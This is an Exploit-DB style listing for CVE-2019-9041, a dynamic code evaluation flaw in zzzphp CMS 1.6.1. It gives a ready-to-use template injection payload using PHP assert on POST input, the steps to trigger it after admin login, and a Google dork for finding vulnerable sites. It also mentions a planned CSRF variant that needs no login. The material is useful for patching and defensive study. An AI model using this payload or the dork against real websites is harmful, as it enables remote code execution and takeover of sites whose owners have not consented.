header-logo
Suggest Exploit
vendor:
zzzphp
by:
Yang Chenglong
7.2
CVSS
HIGH
Dynamic Code Evaluation
78
CWE
Product Name: zzzphp
Affected Version From: 1.6.1
Affected Version To: 1.6.1
Patch Exists: YES
Related CWE: CVE-2019-9041
CPE: a:zzzcms:zzzphp:1.6.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows/Linux,iis/apache
2019

dynamic code evaluation of zzzphp cms 1.6.1

Due to the failure of filtering function parserIfLabel() in inc/zzz_template.php, attackers can insert dynamic php code into the template file and leads to dynamic code evaluation. Login in to the admin panel, edit the template of search.html, insert the following code: {if:assert($_POST[x])}phpinfo();{end if} Visit the http://webroot/search/ and post data “x = phpinfo();”, the page will execute the php code “phpinfo()” as follow.

Mitigation:

Filter user input and validate the data before using it in the application.
Source

Exploit-DB raw data:

# Exploit Title: dynamic code evaluation of zzzphp cms 1.6.1

# Google Dork: intext:"2015-2019 zzcms.com"

# Date: 24/02/2019

# Exploit Author: Yang Chenglong

# Vendor Homepage: http://www.zzzcms.com/index.html

# Software Link: http://115.29.55.18/zzzphp.zip

# Version: 1.6.1

# Tested on: windows/Linux,iis/apache

# CVE : CVE-2019-9041

Due to the failure of filtering function parserIfLabel() in inc/zzz_template.php, attackers can insert dynamic php code into the template file and leads to dynamic code evaluation.

Exploit:
login in to the admin panel, edit the template of search.html, insert the following code:

{if:assert($_POST[x])}phpinfo();{end if}

Visit the http://webroot/search/ and post data “x = phpinfo();”, the page will execute the php code “phpinfo()” as follow:
[1.png]

Remarks:
While the above exploit requires attackers to have the access to the admin panel, I will post another exploit by using csrf to acquire the control of website without access to the admin panel.